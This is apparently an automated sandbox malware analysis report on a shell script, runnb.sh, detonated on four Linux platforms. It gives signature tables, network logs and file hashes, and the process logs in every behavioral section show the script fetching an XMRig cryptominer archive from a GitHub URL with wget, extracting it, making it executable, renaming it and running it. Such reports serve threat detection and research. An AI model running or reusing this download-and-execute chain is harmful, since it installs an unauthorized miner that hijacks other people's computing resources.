Malware Analysis Report

2025-08-10 16:40

Sample ID 241030-qfed7avqfl
Target runnb.sh
SHA256 a5951456684af2a46da1bcd8c820221c97b13a439db465c2b671fa3180d838d6
Tags
defense_evasion discovery privilege_escalation
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

a5951456684af2a46da1bcd8c820221c97b13a439db465c2b671fa3180d838d6

Threat Level: Shows suspicious behavior

The file runnb.sh was found to be: Shows suspicious behavior.

Malicious Activity Summary

defense_evasion discovery privilege_escalation

File and Directory Permissions Modification

Abuse Elevation Control Mechanism: Sudo and Sudo Caching

Reads CPU attributes

Reads runtime system information

Writes file to tmp directory

Enumerates kernel/hardware configuration

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-30 13:11

Signatures

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-10-30 13:11

Reported

2024-10-30 13:14

Platform

debian9-mipsel-20240611-en

Max time kernel

47s

Max time network

50s

Command Line

[/tmp/runnb.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A

Abuse Elevation Control Mechanism: Sudo and Sudo Caching

privilege_escalation defense_evasion
Description Indicator Process Target
N/A N/A /usr/bin/sudo N/A

Reads CPU attributes

discovery
Description Indicator Process Target
File opened for reading /sys/devices/system/cpu/online /usr/sbin/exim4 N/A
File opened for reading /sys/devices/system/cpu/online /usr/sbin/exim4 N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/kernel/ngroups_max /usr/sbin/sendmail N/A
File opened for reading /proc/self/fd /usr/bin/apt N/A
File opened for reading /proc/filesystems /usr/bin/sudo N/A
File opened for reading /proc/self/stat /usr/bin/sudo N/A
File opened for reading /proc/self/fd /usr/bin/sudo N/A
File opened for reading /proc/self/fd /usr/bin/apt N/A
File opened for reading /proc/filesystems /usr/bin/dpkg N/A
File opened for reading /proc/filesystems /usr/bin/dpkg N/A
File opened for reading /proc/filesystems /bin/mv N/A
File opened for reading /proc/sys/kernel/ngroups_max /usr/sbin/sendmail N/A
File opened for reading /proc/filesystems /usr/bin/dpkg N/A
File opened for reading /proc/filesystems /usr/bin/dpkg N/A
File opened for reading /proc/filesystems /bin/tar N/A
File opened for reading /proc/sys/kernel/ngroups_max /usr/bin/sudo N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/fileutl.message.rI7jbi /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.dXYb6i /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.jERPhv /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.x7IX4P /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.Xq4tlU /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.FgDUuY /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.VTey0i /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.vXs1CJ /usr/bin/apt N/A

Processes

/tmp/runnb.sh

[/tmp/runnb.sh]

/usr/bin/sudo

[sudo apt install wget]

/usr/sbin/sendmail

[sendmail -t]

/usr/sbin/sendmail

[sendmail -t]

/usr/bin/apt

[apt install wget]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/sbin/exim4

[/usr/sbin/exim4 -Mc 1t67YZ-0000BY-Ui]

/usr/sbin/exim4

[/usr/sbin/exim4 -Mc 1t67YZ-0000Bb-Ut]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/apt

[apt install wget]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/wget

[wget https://github.com/orkaroeli/orkaroeliminer/raw/refs/heads/main/xmrigtar.tar.gz]

/bin/tar

[tar xvf xmrigtar.tar.gz]

/bin/chmod

[chmod +x xmrig]

/bin/mv

[mv xmrig cool]

/tmp/cool

[./cool]

Network

Country Destination Domain Proto
US 1.1.1.1:53 debian9-mipsel-20240611-en-7 udp
US 1.1.1.1:53 debian9-mipsel-20240611-en-7 udp
US 1.1.1.1:53 debian9-mipsel-20240611-en-7 udp
US 1.1.1.1:53 debian9-mipsel-20240611-en-7 udp
US 1.1.1.1:53 debian9-mipsel-20240611-en-7 udp
US 1.1.1.1:53 debian9-mipsel-20240611-en-7 udp
US 1.1.1.1:53 debian9-mipsel-20240611-en-7 udp
US 1.1.1.1:53 debian9-mipsel-20240611-en-7 udp
US 1.1.1.1:53 debian9-mipsel-20240611-en-7 udp
US 1.1.1.1:53 debian9-mipsel-20240611-en-7 udp
US 1.1.1.1:53 github.com udp
GB 20.26.156.215:443 github.com tcp

Files

/var/spool/exim4/input/1t67YZ-0000BY-Ui-D

MD5 c94a3c403586f5f0867c7f8b10e5a14f
SHA1 9c9b872355c1113a077e17fec0af867314f06dfa
SHA256 1b0b4b4ae2c32a2807649037e0a9a4637bf3eb0c6cf2a6160759bff6b89e82b8
SHA512 24b27b9866e1ceaca4a17b07e01a56d3739b9f3cc6db9cedadf14112b974bc76f8fb65948a408f7974bdeb7f80a2ad278a242af8cd95f5d446154f03281dbb5f

/var/spool/exim4/input/1t67YZ-0000Bb-Ut-D

MD5 56f39a50cbed2a535de2bf72bcabcbfb
SHA1 dc13ec1acba48996ae76f4a7f97cf3a1c16bd74a
SHA256 a4850cbfc76f0a618e17c8cb2b361d9fb34dd891daca112e16bc53bd3b85f448
SHA512 ea9b82b4191d5c582feb82b950816120fd452acc26bf74ffc1b3db61504a86b178d416262e8a998f57be2a623b3e8c36660a291e39b2e58ae300f1b6b9de90b6

/var/spool/exim4/input/hdr.716

MD5 e2575c47c21aa2a9c5ca6e57210aef5b
SHA1 c7067db18d107329a8fcf6f732ee2ec4d4eb8d16
SHA256 b8280645a199d15261d59dddb1616a9d46be469632c3c4bd2f22d2c123b5d2cc
SHA512 90d2e154aecb6da327275ffa8691be28a9d786c7724ea8267fc6d86c08008c3ec79cb167599a50737971269e50907c31f121d9c1e947c481c4816866f7d4e5f6

/var/spool/exim4/msglog/1t67YZ-0000Bb-Ut

MD5 1ea3481b3d36973061a897fc035e46f6
SHA1 4a1f30f1a14bdfad060963c9a43e53ce0fe3d1ad
SHA256 c668c3dcd1c8b8199e6b9e876ac43991ab9b0770a84c2784bddad03151f7fd72
SHA512 d9ff93d81d8c9ac9ed978c2de5bb57d3f4caf964dfaa3fa50a7f37fa3e0e6d1b09a4756630b7a7d2530c76d31eff114d040a6956157b66daf3fcb03dce4ec076

/var/spool/exim4/msglog/1t67YZ-0000BY-Ui

MD5 5ff3a8e5d50fc9ea5415d99f17554dbf
SHA1 56dc2fa3bacf8fb391b7746476ee824b7f51e94b
SHA256 bd510c6848c1028976d2912f90a0cd6c5793d1cb7ef7b9de4f8b306ba5277abd
SHA512 390a0b92793d4e7de3c1e713a16b7fcca6ab51544e554fbab39e110b689acd379ddc14de2c973d7bb3f5ff03041ea391e2043bc93c5ca15ea8237dbd0e9e73c0

/var/mail/user

MD5 4ee1bd851c297a572d5247942edd7bce
SHA1 3a970707866bada69f605e9d8083daa684236d42
SHA256 c2fc3103a4bf21fdcf9d9b17aa00f58245a496cdced4814995f1261b86a9a715
SHA512 6cddb2a12f44adb7d72b6afb90d83ad89bacb601b8fc5e0028f02bd8c5eeeaf76aa632fdc3441b039eb2f0449da7f671414beb0fe9de087b04afa3162adf164b

/var/spool/exim4/input/1t67YZ-0000Bb-Ut-J

MD5 d7d96d63d643a4ce3e408eba7dfcedc5
SHA1 c53607f95c5c57beafc1d8266646797a035f76ea
SHA256 21db3a59b2d0ce18fb250b787d6e2c85d12919f5fdf1448c8f48207c4083b159
SHA512 703a03e54776a6ad9b8adc6c475bbc91c06502618fa3b6f495b1a01a4f6f7aa6fb65dc6ba6885ddc6af961627062f1ce1e1d66688288cbd3bef7754d249fa9b3

/var/spool/exim4/msglog/1t67YZ-0000Bb-Ut

MD5 e52e0fe1b583cd62c0b45655d3f4e50d
SHA1 1070ed31f6692be4b26b5ca02a8505045e6b0bc9
SHA256 89784b13a2e728a1345d930da50d76f89bb9e587c531404a50dfb6ee834c8e4c
SHA512 0c4004eac116bddf887e1f0f405f2123c50b86e6beafc86f2668f08f9474d7c4ffee0231ed6c8c13e22877542570249d9d91e1c337aa4a8a69c95dd9e2b15299

/var/mail/user

MD5 c60d17e6c514da2464bffaa872f0f88d
SHA1 c820cf374a76b4c33037e8f38c11e83d06b09555
SHA256 e73aed83399a6de96d4b10cf1675049f9f68e51a2a5982d2a1f0f997d9f4c457
SHA512 505c66f10898e05cfecc87b69ee457403da41a52abc90225a982f28e2e1257226660ba21509528501bb8e669f9332bdede2ecc202fd2a893d1228423ae988952

/var/spool/exim4/msglog/1t67YZ-0000BY-Ui

MD5 b2ea4405315e030a0094a0f3e27cf70f
SHA1 e172162932b66787958dc80aa356195a3d2bf65a
SHA256 76b233f534af74972cea388443d21de32190e86eff2f178deb5d2bd46633308a
SHA512 3ef48d693ec775343c0ff671fb7c9840d33700eca0a8bf66a60f0240b291f9ace74a3c407f481d3876f22b28b25e97649d342c9eaea054d62adaaaea23c663ee

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-30 13:11

Reported

2024-10-30 13:14

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

1s

Max time network

129s

Command Line

[/tmp/runnb.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A

Abuse Elevation Control Mechanism: Sudo and Sudo Caching

privilege_escalation defense_evasion
Description Indicator Process Target
N/A N/A /usr/bin/sudo N/A

Enumerates kernel/hardware configuration

discovery
Description Indicator Process Target
File opened for reading /sys/kernel/mm/transparent_hugepage/hpage_pmd_size /usr/bin/snap N/A
File opened for reading /sys/kernel/mm/transparent_hugepage/hpage_pmd_size /usr/bin/snap N/A
File opened for reading /sys/kernel/mm/transparent_hugepage/hpage_pmd_size /usr/bin/snap N/A
File opened for reading /sys/kernel/mm/transparent_hugepage/hpage_pmd_size /usr/bin/snap N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/kernel/ngroups_max /usr/bin/sudo N/A
File opened for reading /proc/self/fd /usr/bin/apt N/A
File opened for reading /proc/cgroups /usr/bin/snap N/A
File opened for reading /proc/cgroups /usr/bin/snap N/A
File opened for reading /proc/cgroups /usr/bin/snap N/A
File opened for reading /proc/filesystems /bin/tar N/A
File opened for reading /proc/filesystems /usr/bin/dpkg N/A
File opened for reading /proc/cgroups /usr/bin/snap N/A
File opened for reading /proc/cmdline /usr/bin/snap N/A
File opened for reading /proc/cmdline /usr/bin/snap N/A
File opened for reading /proc/filesystems /usr/bin/dpkg N/A
File opened for reading /proc/cmdline /usr/bin/snap N/A
File opened for reading /proc/cmdline /usr/bin/snap N/A
File opened for reading /proc/filesystems /bin/mv N/A
File opened for reading /proc/filesystems /usr/bin/sudo N/A
File opened for reading /proc/self/stat /usr/bin/sudo N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/fileutl.message.x5Ceos /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.XU2EzE /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.g2qIKQ /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.5txVqS /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.KPYsiF /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.OPXXkR /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.IwFAt3 /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.bBFkPQ /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.wTi3lt /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.cB60Yr /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.T0df92 /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.OIT8kE /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.HAHzxf /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.395Zj4 /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.9QEbig /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.yEkgHf /usr/bin/apt N/A

Processes

/tmp/runnb.sh

[/tmp/runnb.sh]

/usr/bin/sudo

[sudo apt install wget]

/usr/bin/apt

[apt install wget]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/bin/sh

[/bin/sh -c [ ! -f /usr/bin/snap ] || /usr/bin/snap advise-snap --from-apt 2>/dev/null || true]

/usr/bin/snap

[/usr/bin/snap advise-snap --from-apt]

/bin/sh

[/bin/sh -c [ ! -f /usr/bin/snap ] || /usr/bin/snap advise-snap --from-apt 2>/dev/null || true]

/usr/bin/snap

[/usr/bin/snap advise-snap --from-apt]

/bin/sh

[/bin/sh -c [ ! -f /usr/bin/snap ] || /usr/bin/snap advise-snap --from-apt 2>/dev/null || true]

/usr/bin/snap

[/usr/bin/snap advise-snap --from-apt]

/bin/sh

[/bin/sh -c [ ! -f /usr/bin/snap ] || /usr/bin/snap advise-snap --from-apt 2>/dev/null || true]

/usr/bin/snap

[/usr/bin/snap advise-snap --from-apt]

/usr/bin/wget

[wget https://github.com/orkaroeli/orkaroeliminer/raw/refs/heads/main/xmrigtar.tar.gz]

/bin/tar

[tar xvf xmrigtar.tar.gz]

/bin/chmod

[chmod +x xmrig]

/bin/mv

[mv xmrig cool]

/tmp/cool

[./cool]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 151.101.1.91:443 tcp
GB 185.125.188.62:443 tcp
GB 185.125.188.62:443 tcp
US 151.101.1.91:443 tcp
GB 195.181.164.14:443 tcp
US 1.1.1.1:53 github.com udp
US 1.1.1.1:53 github.com udp

Files

/tmp/fileutl.message.5txVqS

MD5 373fe2f2ef99005d2550a482f09a3e51
SHA1 68e6572b55b1e77f7d171ebac7b2579b7a6bd51d
SHA256 7552d5ab0c3879756a860aaab8e7c2f8ffb9409ea9ff9e65fc046ba5c519ebe5
SHA512 def9e854b824d2fddc6a15f898be73cfb679ac38563f5af854546f49c9d5d2316a40176dc41d6b360bda7b65de53863a53e4eedadf6336000b031b77a113607b

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-30 13:11

Reported

2024-10-30 13:15

Platform

debian9-armhf-20240611-en

Max time kernel

5s

Max time network

36s

Command Line

[/tmp/runnb.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A

Abuse Elevation Control Mechanism: Sudo and Sudo Caching

privilege_escalation defense_evasion
Description Indicator Process Target
N/A N/A /usr/bin/sudo N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/filesystems /usr/bin/sudo N/A
File opened for reading /proc/sys/kernel/ngroups_max /usr/bin/sudo N/A
File opened for reading /proc/self/stat /usr/bin/sudo N/A
File opened for reading /proc/self/fd /usr/bin/apt N/A
File opened for reading /proc/filesystems /usr/bin/dpkg N/A
File opened for reading /proc/filesystems /usr/bin/dpkg N/A
File opened for reading /proc/filesystems /bin/tar N/A
File opened for reading /proc/filesystems /bin/mv N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/fileutl.message.wVucC6 /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.OQ1lwc /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.CECbQm /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.xyNGYm /usr/bin/apt N/A

Processes

/tmp/runnb.sh

[/tmp/runnb.sh]

/usr/bin/sudo

[sudo apt install wget]

/usr/bin/apt

[apt install wget]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/wget

[wget https://github.com/orkaroeli/orkaroeliminer/raw/refs/heads/main/xmrigtar.tar.gz]

/bin/tar

[tar xvf xmrigtar.tar.gz]

/bin/chmod

[chmod +x xmrig]

/bin/mv

[mv xmrig cool]

/tmp/cool

[./cool]

Network

Country Destination Domain Proto
US 1.1.1.1:53 github.com udp

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-10-30 13:11

Reported

2024-10-30 13:14

Platform

debian9-mipsbe-20240611-en

Max time kernel

48s

Max time network

50s

Command Line

[/tmp/runnb.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A

Abuse Elevation Control Mechanism: Sudo and Sudo Caching

privilege_escalation defense_evasion
Description Indicator Process Target
N/A N/A /usr/bin/sudo N/A

Reads CPU attributes

discovery
Description Indicator Process Target
File opened for reading /sys/devices/system/cpu/online /usr/sbin/exim4 N/A
File opened for reading /sys/devices/system/cpu/online /usr/sbin/exim4 N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/filesystems /bin/mv N/A
File opened for reading /proc/sys/kernel/ngroups_max /usr/bin/sudo N/A
File opened for reading /proc/filesystems /usr/bin/dpkg N/A
File opened for reading /proc/self/fd /usr/bin/apt N/A
File opened for reading /proc/filesystems /usr/bin/dpkg N/A
File opened for reading /proc/filesystems /bin/tar N/A
File opened for reading /proc/filesystems /usr/bin/sudo N/A
File opened for reading /proc/sys/kernel/ngroups_max /usr/sbin/sendmail N/A
File opened for reading /proc/self/fd /usr/bin/apt N/A
File opened for reading /proc/filesystems /usr/bin/dpkg N/A
File opened for reading /proc/filesystems /usr/bin/dpkg N/A
File opened for reading /proc/self/stat /usr/bin/sudo N/A
File opened for reading /proc/self/fd /usr/bin/sudo N/A
File opened for reading /proc/sys/kernel/ngroups_max /usr/sbin/sendmail N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/fileutl.message.LnZFXF /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.8LbZSq /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.Q3iYUI /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.eXG3n8 /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.DhA2ig /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.Ik8e1r /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.7ZewYI /usr/bin/apt N/A
File opened for modification /tmp/fileutl.message.aMQ4G4 /usr/bin/apt N/A

Processes

/tmp/runnb.sh

[/tmp/runnb.sh]

/usr/bin/sudo

[sudo apt install wget]

/usr/sbin/sendmail

[sendmail -t]

/usr/sbin/sendmail

[sendmail -t]

/usr/bin/apt

[apt install wget]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/sbin/exim4

[/usr/sbin/exim4 -Mc 1t67YY-0000Bf-SA]

/usr/sbin/exim4

[/usr/sbin/exim4 -Mc 1t67YY-0000Bc-TS]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/apt

[apt install wget]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/wget

[wget https://github.com/orkaroeli/orkaroeliminer/raw/refs/heads/main/xmrigtar.tar.gz]

/bin/tar

[tar xvf xmrigtar.tar.gz]

/bin/chmod

[chmod +x xmrig]

/bin/mv

[mv xmrig cool]

/tmp/cool

[./cool]

Network

Country Destination Domain Proto
US 1.1.1.1:53 debian9-mipsbe-20240611-en-3 udp
US 1.1.1.1:53 debian9-mipsbe-20240611-en-3 udp
US 1.1.1.1:53 debian9-mipsbe-20240611-en-3 udp
US 1.1.1.1:53 debian9-mipsbe-20240611-en-3 udp
US 1.1.1.1:53 debian9-mipsbe-20240611-en-3 udp
US 1.1.1.1:53 debian9-mipsbe-20240611-en-3 udp
US 1.1.1.1:53 debian9-mipsbe-20240611-en-3 udp
US 1.1.1.1:53 debian9-mipsbe-20240611-en-3 udp
US 1.1.1.1:53 debian9-mipsbe-20240611-en-3 udp
US 1.1.1.1:53 debian9-mipsbe-20240611-en-3 udp
US 1.1.1.1:53 github.com udp
GB 20.26.156.215:443 github.com tcp

Files

/var/spool/exim4/input/1t67YY-0000Bf-SA-D

MD5 1919bf4cd4bccf341d51c509a5c7ebe6
SHA1 91176ddc095f402d808c028c4aecd7c27c5df204
SHA256 7c57d60b55f4f58b5c69169f46b027f69e578520ba3a3aee57c812d0664787cf
SHA512 4ced20a83bf398c679fd3d8b026f6f29615ccf9a7dcc2f9360698b183872184643c83e6c408668f5eb489ef216c50dea511b7398eb80e78049477a15a04c9d1b

/var/spool/exim4/input/1t67YY-0000Bc-TS-D

MD5 5b4456a63fab269723b583310afd51ef
SHA1 0337d3c840f818744e913c861c9a66dede70bfac
SHA256 3b2faafccae5cd1798ac5c705b4f3d1380f9465b430a710e2f0b79a0f185c645
SHA512 a3790ca6b9bca038a038c3a54877cf468c02fcf9471d26a19b6298cd949af75f2e9163f77f782190b446dfd73dda010b67931cc0aca90654ad29d79748c8c4ca

/var/spool/exim4/input/hdr.723

MD5 f516ada389b33a9066cc26856b92af86
SHA1 d2d7ecdf754cbc6d3e6057085f834e610ad399b1
SHA256 09d73ff8d26ef12b22f096c264f1c8af9fbba70f82acb647c7b04fb6594aba77
SHA512 edff4cbefe00f91c193c521c2c52ad3ce8c9247d5f35b190763c50eecbf4ce1de0158d72e903c87a9820e319a4198d832df5d4a1fc65c00a78ae057ecf6e15f3

/var/spool/exim4/msglog/1t67YY-0000Bf-SA

MD5 a2dd77d1e0ed7340d745a8802e89f869
SHA1 da07b1fafe5c53b3be089126bf27623191246ffa
SHA256 e8b33e8c949d40c3351edb0a9b44f0eb92cf93071e1ed712872e5d9a97401972
SHA512 dbc34f5e4fb99c9e13dc8a83e0de1a317b17574b3a014060cb7ed5a18f051cf544379e85b9a88b9509ec43b3713edc07258737145866bb25847eb1ea726e5988

/var/spool/exim4/msglog/1t67YY-0000Bc-TS

MD5 47b192cbf5345e029b4745b9bf307adc
SHA1 abbaf31e0e9b13b5996c2c35b19d2a20f5862532
SHA256 990cc6c25c5754e5e3171f603d580db758ddd9c3546e0f0b7eef69918990f4ed
SHA512 4e1e2d38e294ec27eb8c2784ffd3a45bf4d04a872483dd3e382b54717a435c88a91b5c6c6d97e1d2ac5a3ee1209aaf2d24b9678f8668106df101162a9b64dfa3

/var/mail/user

MD5 d374316c12d01a213d977ace8aefb99f
SHA1 0e280e7ec4bc03f7bddac65df4785535cc4f2e69
SHA256 0ce8f1a190f91fb2b8d28a37ba24c7ba679db84d8d83f3cf95c158c8e48f397b
SHA512 02abcb2f0774e5141e67e92fb356d96b29a5b947cfd9e937613fce75c7a973151bd1d4231a45b1b66fe089fb0aa7b477943836b7c5e3d15c3a73bbfd5aac1a7e

/var/spool/exim4/input/1t67YY-0000Bf-SA-J

MD5 d7d96d63d643a4ce3e408eba7dfcedc5
SHA1 c53607f95c5c57beafc1d8266646797a035f76ea
SHA256 21db3a59b2d0ce18fb250b787d6e2c85d12919f5fdf1448c8f48207c4083b159
SHA512 703a03e54776a6ad9b8adc6c475bbc91c06502618fa3b6f495b1a01a4f6f7aa6fb65dc6ba6885ddc6af961627062f1ce1e1d66688288cbd3bef7754d249fa9b3

/var/spool/exim4/msglog/1t67YY-0000Bf-SA

MD5 7f013cb9d365c939aef52ca4782c9e4d
SHA1 417bd479712caca7a19e22d5769a81fc2fc8bd1c
SHA256 fe1e636dddc8915cbf21efa862e0df84b84b61f6d069b4898c249202fc32f54a
SHA512 0ff468ae3f824b6ea6638c1bceeeb75a9339f59db37fb6b2ce326808e3ac99f75a1529e2807a35122c2de1cbcbb3ecd2fc1411c52c979524a2683f48d106e140

/var/mail/user

MD5 93689982b9dcbfdbe8131bb5fcb49a9e
SHA1 0dc7522895cbf2bbf1a5fd02a64a901d1a5836db
SHA256 b58f93d357915929c8df2d6133b16038c418219419242d768facca7650676d72
SHA512 9017053243c38e2c16c419a467d18e2d1835f68ab9aa86347b62cefcf08edb274a8c5dc260bf53e541d0d3c4ed8f023213d5a22ba16d68a9578a958183e7ceee

/var/spool/exim4/msglog/1t67YY-0000Bc-TS

MD5 839f294d8baf36fd0f7e105cbb86e207
SHA1 20c8e237549a848792804818c4a99b5ba62d7543
SHA256 35b33356a4a8faa3e7f517301cc5947ec2bbb6c0473b7ab964b07892949c7776
SHA512 0de3a44206482f92cf064dab9f3c8ed6ec4c3f2c46d6225453bf04e250d454d6fc06645dc7ffc996e8e0daabe5ded613bb246793032c5a340bbca8c33e18bee7

memory/765-1-0x7762b000-0x7763c050-memory.dmp